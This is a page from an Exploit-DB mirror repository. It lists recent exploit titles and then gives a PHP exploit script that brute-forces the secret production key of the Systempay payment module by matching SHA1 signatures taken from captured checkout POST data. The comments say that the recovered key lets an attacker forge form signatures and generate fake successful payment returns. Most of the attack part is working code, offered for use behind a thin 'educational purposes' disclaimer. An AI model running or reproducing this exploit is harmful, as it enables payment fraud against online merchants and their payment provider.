bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48017.php
Offensive Security 923f53211e DB: 2020-02-07 
16 changes to exploits/shellcodes

AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)
AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)
VIM 8.2 - Denial of Service (PoC)
AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
TapinRadio 2.12.3 - 'username' Denial of Service (PoC)
RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)

ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
Online Job Portal 1.0 - 'user_email' SQL Injection
Online Job Portal 1.0 - Remote Code Execution
Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
Ecommerce Systempay 1.0 - Production KEY Brute Force
Cisco Data Center Network Manager 11.2 - Remote Code Execution
Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection
2020-02-07 05:02:01 +00:00

98 lines
No EOL
2.9 KiB
PHP
Raw Blame History

# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force
# Author: live3
# Date: 2020-02-05
# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
# Tested on: MacOs
# Version: ALL
<?php
/**
*
* INFORMATION
* Exploit Title: Ecommerce Systempay decode secret production KEY / Brute Force
* Author: live3
* Date: 2020-02-05
* Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
* Tested on: MacOs
* Version: ALL
* Prerequisite: Find a ecommerce who is using Systempay AND SHA1 to crypt signature.
* Put some product on cart and choose systempay for payment method.
* get all data from post sent to https://paiement.systempay.fr/vads-payment/
* keep signature as reference and all vads fields to create new signature.
* Use script to make a brute force on Secret product key (16 char length)
*
* Usage: Once you have the production KEY all modifications on form data will be accepted by systempay ! (You will just generate new signature with your changes)
* You will be able to generate a success payment return !
*
* FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
* THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
*
*/
// Set the start number you want (16 char length)
$last_key_check = '1000000000000000';
// Assign var
$array_key = array();
$sentence = '';
$how_many_key_to_check_for_loop = 10;
// Put here signature extract from POST DATA
// Example of SHA1 from string : test
$signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3';
// Copy paste your content decoded of POST DATA
$form_data = '
vads_field_1: VALUE1
vads_field_2: VALUE2
// AND ALL OTHER FIELDS...
';
$array = explode(PHP_EOL, $form_data);
foreach ($array as $data) {
if ($data != '') {
$elements = explode(': ', $data);
if (!empty($elements)) {
$array_key[trim($elements[0])] = $elements[1];
}
}
}
ksort($array_key);
foreach ($array_key as $value) {
$sentence .= $value . '+';
}
echo 'Signature from POST DATA : '.$signature_from_post.'<br/>';
$found = false;
$get_key = '';
// first check
if (sha1($sentence.$last_key_check) != $signature_from_post) {
for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) {
$get_key = $i;
if (sha1($sentence.$i) == $signature_from_post) {
echo 'Key found : '.$i.'<br/>';
$found = true;
break;
}
}
} else {
$found = true;
}
if ($found) {
$test_sha = sha1($sentence.$get_key);
echo 'Signature calc : '.$test_sha.'<br/><hr/>';
} else {
echo 'Last key check : '.$get_key.'<br/><hr/>';
}
echo 'Your sequence : '.$sentence.'<br/>';
Reference in a new issue View git blame Copy permalink